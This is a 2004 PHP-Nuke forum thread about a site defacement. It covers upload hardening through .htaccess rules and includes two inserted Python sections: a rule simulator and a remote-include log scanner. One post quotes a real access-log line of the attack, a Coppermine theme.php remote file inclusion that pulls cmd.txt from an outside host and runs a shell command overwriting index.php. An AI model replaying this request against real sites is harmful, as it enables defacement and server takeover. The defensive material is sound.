Nuke Cops :: View topic - [Site hacked] index.php was being replaced/edited
ring_c (Nuke Soldier)
Joined: Dec 15, 2003
Posts: 27
Posted: Tue Jun 01, 2004 5:14 pm

For the last 24 hours, my site was hacked twice with the same method.
Somehow, someone managed to alter/replace my index.php.

Today they left an index.php with this: "Rebellious Fingers - rebellious@end-war.com"

I'm using phpnuke v6.7.
Is this a known issue?
Is there a solution?

I also have Fortress running, and it didn't seem to bother them, nor did I get an email from it.

Any help will do, please!
madman (Support Mod)
Joined: Feb 15, 2004
Posts: 806
Posted: Tue Jun 01, 2004 5:30 pm

If you are using modules/addons which have a file upload feature, that could be the cause. Some XSS methods can also do the trick, which let your server create a file and then rename it with a php extension.

The solution: update any modules/addons/scripts that allow your visitors to upload a file to your site. If your server is running under Linux (or some *nix system that supports the ext2/ext3 file system), and you have access to the server shell, you can use the chattr shell command to change PHP-Nuke file attributes.

ring_c (Nuke Soldier)
Joined: Dec 15, 2003
Posts: 27
Posted: Tue Jun 01, 2004 5:42 pm

madman wrote:
If you are using modules/addons which have a file upload feature, that could be the cause. Some XSS methods can also do the trick, which let your server create a file and then rename it with a php extension.

I have the attach_mod in my phpbb. Could that be the problem?
Otherwise, I have the "upload files" in my admin panel too. I'll remove this one, as I'm not using it anyway...

madman wrote:
If your server is running under Linux (or some *nix system that supports the ext2/ext3 file system), and you have access to the server shell, you can use the chattr shell command to change PHP-Nuke file attributes.

Now, this is Chinese to me... Sad
madman (Support Mod)
Joined: Feb 15, 2004
Posts: 806
Posted: Tue Jun 01, 2004 6:00 pm

ring_c wrote:
I have the attach_mod in my phpbb. Could that be the problem?


Try updating to attach mod 2.3.9 and enable the security script code in download.php (part of the attach mod files). In addition, you can put a .htaccess file (if your server is running Apache, with full override for mod_access and mod_rewrite) into the attach mod upload directory (default is "/files/"). Here is the content of the .htaccess file:

Code:
<Files .htaccess>
  Order Allow,Deny
  Deny from all
</Files>

<FilesMatch "\.(p?html?|inc|php.?|pl|js|cgi|asp|conf)$">
  Order Allow,Deny
  Deny from all
</FilesMatch>

RewriteEngine on
RewriteCond %{HTTP_REFERER} !^http://(www\.)?YOURDOMAIN.FOO.BAR/.*$ [NC]
RewriteRule .*$ - [F]


Replace YOURDOMAIN.FOO.BAR above with your actual domain (you don't have to supply www prefix).

ring_c wrote:
Otherwise, I have the "upload files" in my admin panel too. I'll remove this one, as I'm not using it anyway...


Good idea.

ring_c wrote:
Now, this is Chinese to me... Sad


Question Rolling Eyes

ring_c (Nuke Soldier)
Joined: Dec 15, 2003
Posts: 27
Posted: Tue Jun 01, 2004 6:11 pm

madman wrote:
Try updating to attach mod 2.3.9 and enable the security script code in download.php (part of the attach mod files).


I am using 2.3.9.
I couldn't quite understand the second part of your sentence. Where do I enable the script code? Also, I couldn't find any download.php under attach_mod.

madman wrote:
In addition, you can put .htaccess file

Thanks. done that.
madman (Support Mod)
Joined: Feb 15, 2004
Posts: 806
Posted: Tue Jun 01, 2004 6:29 pm

ring_c wrote:
I couldn't quite understand the second part of your sentence. Where do I enable the script code? Also, I couldn't find any download.php under attach_mod.


If you are running stand-alone phpbb, download.php is in your phpbb root directory. If you are running the bb2nuke ported mod (the PHP-Nuke standard forum module), it is located in the modules/Forums/ directory. By default, the security script code is commented out in this file. Read further in the comments in that download.php file.

ring_c wrote:
Thanks. done that.


Cool

zanis (Lieutenant)
Joined: Aug 21, 2003
Posts: 213
Posted: Wed Jun 02, 2004 12:42 am

madman wrote:
In addition, you can put a .htaccess file (if your server is running Apache, with full override for mod_access and mod_rewrite) into the attach mod upload directory (default is "/files/"). Here is the content of the .htaccess file:

Code:
<Files .htaccess>
  Order Allow,Deny
  Deny from all
</Files>

<FilesMatch "\.(p?html?|inc|php.?|pl|js|cgi|asp|conf)$">
  Order Allow,Deny
  Deny from all
</FilesMatch>

RewriteEngine on
RewriteCond %{HTTP_REFERER} !^http://(www\.)?YOURDOMAIN.FOO.BAR/.*$ [NC]
RewriteRule .*$ - [F]


Replace YOURDOMAIN.FOO.BAR above with your actual domain (you don't have to supply www prefix).



Hello madman!

I was wondering if you could help me by explaining how this works and is it required if you allow your members to upload their own avatars for the forum?

Cheers

Zanis
madman (Support Mod)
Joined: Feb 15, 2004
Posts: 806
Posted: Wed Jun 02, 2004 8:02 am

zanis wrote:
I was wondering if you could help me by explaining how this works


That .htaccess file is the last chance to prevent someone uploading files and executing them. Let's take a look at all those modifiers one by one:

Code:
<Files .htaccess>
  Order Allow,Deny
  Deny from all
</Files>


This is to protect the .htaccess file itself. Usually .htaccess must be stored with 644 CHMOD attributes, but sometimes we forget to do so; then this identifier will ensure the .htaccess file cannot be altered in any way from outside (however, it is still alterable from ftp or other server-side file management).

Code:
<FilesMatch "\.(p?html?|inc|php.?|pl|js|cgi|asp|conf)$">
  Order Allow,Deny
  Deny from all
</FilesMatch>


This identifier will prevent some uploadable files from being executed from outside. In the declaration above, I restrict .htm, .html, .phtml, .phtm, .inc, .php, .php3, .php4, .pl, .js, .cgi, .asp, and .conf from being executed (if they exist). If someone can pass such files through the file upload checking in a script, they still won't be able to execute them due to the server/apache restriction.

Code:
RewriteEngine on
RewriteCond %{HTTP_REFERER} !^http://(www\.)?YOURDOMAIN.FOO.BAR/.*$ [NC]
RewriteRule .*$ - [F]


This prevents hotlinking. This ensures all files stored in the upload directory must be requested from inside your domain. Please note the originating request is taken from the referer header. This means people using a firewall/proxy which strips the referer header will get the same restriction.

Quote:
is it required if you allow your members to upload their own avatars for the forum?


You can put that .htaccess in the avatar upload directory as well. Be sure there are no subdirs containing your scripting files below the upload directory. But for security reasons (which is what this forum is for), in my opinion do not let users upload their avatars to your site. Provide only local/pre-existing avatars or let them use remote avatars (but still keep checking their extension and doing valid image checking; however, this is already done in phpbb).

Sorry if this sounds too complicated. I can't explain it in simple words, maybe because we are talking about a technical topic. Perhaps someone can explain this better than me. Smile But honestly, playing with .htaccess isn't ever simple. This is the Swiss Army knife of Apache, similar to Regedit in Windows. If you do this the wrong way, you'll screw up the entire system.

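To see what the three rules above actually accept and reject, here is an added Python simulation of the FilesMatch pattern and the referer RewriteCond (example code written for this page, not from the thread or from Apache); the domain example.org is a constructed stand-in for YOURDOMAIN.FOO.BAR, and an empty referer models the proxy case madman describes.

```python
import re

# Pattern copied from the thread's <FilesMatch> directive.
BLOCKED_EXT = re.compile(r"\.(p?html?|inc|php.?|pl|js|cgi|asp|conf)$")

# Referer pattern from the RewriteCond. example.org is a constructed
# stand-in for YOURDOMAIN.FOO.BAR; the [NC] flag becomes re.IGNORECASE.
SITE = "example.org"
OWN_REFERER = re.compile(r"^http://(www\.)?" + re.escape(SITE) + r"/.*$",
                         re.IGNORECASE)


def files_match_blocks(filename: str) -> bool:
    """True if the <FilesMatch> block denies this file name (403)."""
    return BLOCKED_EXT.search(filename) is not None


def rewrite_blocks(referer: str) -> bool:
    """True if the hotlink rule answers 403 ([F]) for this Referer value.

    The RewriteCond is negated (!), so any referer that does not match the
    site's own URL prefix triggers the rule.  An empty string models a
    request whose Referer header was stripped by a proxy or firewall.
    """
    return OWN_REFERER.match(referer) is None


def status_for(filename: str, referer: str) -> int:
    """HTTP status the upload directory would return for the request."""
    if files_match_blocks(filename) or rewrite_blocks(referer):
        return 403
    return 200


if __name__ == "__main__":
    for name in ("avatar.jpg", "shell.php", "x.php3", "page.htm",
                 "shell.php.jpg"):
        print(f"{name:15} FilesMatch blocks: {files_match_blocks(name)}")
    for ref in ("http://www.example.org/viewtopic.php?t=1", "",
                "http://other.example/"):
        print(f"referer {ref!r:45} blocked: {rewrite_blocks(ref)}")
```

Because the pattern is anchored with `$`, only the final extension is inspected (shell.php.jpg is not matched), so these rules are a backstop for strict upload validation, not a replacement for it.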
Stephen2417 (Major)
Joined: Dec 26, 2003
Posts: 1135
Location: Bristolville, OH (US)
Posted: Wed Jun 02, 2004 9:01 am

Alright, I said I was leaving once, but I just can't sit here and watch you guys guess..

Plain and simple, it's coppermine.
burnwave (Sergeant)
Joined: Sep 13, 2003
Posts: 107
Location: Maryland, USA
Posted: Wed Jun 02, 2004 9:33 am

Where is his coppermine module on his site? All I am seeing is 4nAlbum. Does that module have public upload features? If so, that could be the case.

_________________
Wow. Just wow.
SaraHol (Corporal)
Joined: Aug 29, 2003
Posts: 71
Posted: Thu Jun 03, 2004 8:15 am

That's a great post Madman. I certainly learned some stuff from it. Thanks.
thewizard (Sergeant)
Joined: Sep 01, 2003
Posts: 134
Location: Germany
Posted: Thu Jun 03, 2004 12:10 pm

Well, haven't been here for a long time too. Wink.

So look, that's the way it's done. The vulnerable part is coppermine.
Got the guy and one of his DSL IPs from Brazil.

200.96.250.204 - - [01/Jun/2004:20:30:53 +0200] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://magnific.webcindario.com/cmd.txt?&cmd=cd%20/here the string for your home directory/;mv%20you.txt%20index.php HTTP/1.1"

Well, maybe someone can have a closer look at this cmd.txt mentioned in the string. If it's been deleted meanwhile, I took a copy Rolling Eyes so just PM me if someone wants it.

_________________

Rather must you Become, and Become, and Become, until Hackers respect thy Power, and other Wizards hail thee as a Brother or Sister in Wisdom, and you wake up and realize that the Mantle hath lain unknown upon thy Shoulders since you knew not when.

Last edited by thewizard on Thu Jun 03, 2004 12:24 pm; edited 1 time in total
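A defender-side check, added here and not taken from the thread: scan Apache access-log lines in the format shown above for query parameters whose decoded value is an absolute URL, which is the remote-include shape of the theme.php request in the log line. The sample lines, client addresses and the attacker.example host are constructed for this example.

```python
import re
from urllib.parse import urlsplit, unquote

# Apache common/combined log prefix: client, ident, user, [time], "request".
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)"')

# A parameter value that is itself an absolute URL is the remote-include
# pattern: the script is being told to fetch its "theme" or "include" file
# from a host the attacker controls instead of a local directory.
REMOTE_URL = re.compile(r"^(https?|ftp)://", re.IGNORECASE)

# Constructed sample lines (documentation addresses and a made-up host);
# the request shapes mirror the thread's log line.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jun/2004:20:30:53 +0200] "GET /modules/coppermine/'
    'themes/default/theme.php?THEME_DIR=http://attacker.example/cmd.txt '
    'HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jun/2004:20:31:10 +0200] "GET /modules/coppermine/'
    'themes/default/theme.php?THEME_DIR=default HTTP/1.1" 200 4096',
    '198.51.100.8 - - [01/Jun/2004:20:32:00 +0200] "GET /modules.php?'
    'name=Forums&file=viewtopic&t=12 HTTP/1.1" 200 9000',
    '203.0.113.5 - - [01/Jun/2004:20:33:12 +0200] "GET /modules.php?'
    'name=News&url=HTTP%3A%2F%2Fattacker.example%2Fx.txt HTTP/1.1" 404 300',
]


def find_remote_include_attempts(log_lines):
    """Return (client, path, param, decoded_value) for every query parameter
    whose percent-decoded value is an absolute URL."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line; skip it
        parts = urlsplit(m.group("target"))
        for pair in parts.query.split("&"):
            name, _, value = pair.partition("=")
            decoded = unquote(value).strip()  # catches %-encoded schemes
            if REMOTE_URL.match(decoded):
                hits.append((m.group("client"), parts.path, name, decoded))
    return hits


if __name__ == "__main__":
    for client, path, param, value in find_remote_include_attempts(SAMPLE_LOG):
        print(f"{client} {path} {param}={value}")
```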
Stephen2417 (Major)
Joined: Dec 26, 2003
Posts: 1135
Location: Bristolville, OH (US)
Posted: Thu Jun 03, 2004 12:22 pm

Great, thanks for posting how to hack a site with coppermine... suggest you remove that.
thewizard (Sergeant)
Joined: Sep 01, 2003
Posts: 134
Location: Germany
Posted: Thu Jun 03, 2004 12:27 pm

No matter.
Exclamation Exclamation I think it's better the guys out there disable their coppermine until it's secured. Seems it's only ONE way to hack the module.

_________________

Rather must you Become, and Become, and Become, until Hackers respect thy Power, and other Wizards hail thee as a Brother or Sister in Wisdom, and you wake up and realize that the Mantle hath lain unknown upon thy Shoulders since you knew not when.
Stephen2417 (Major)
Joined: Dec 26, 2003
Posts: 1135
Location: Bristolville, OH (US)
Posted: Thu Jun 03, 2004 12:33 pm

Well, if you're directly accessing the file, I don't think that would matter, you know..

All you have to do is get the latest version and you're done.
Powered by phpBB © 2001, 2005 phpBB Group

Ported by Nuke Cops © 2003 www.nukecops.com
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::
Web site engine's code is Copyright © 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license.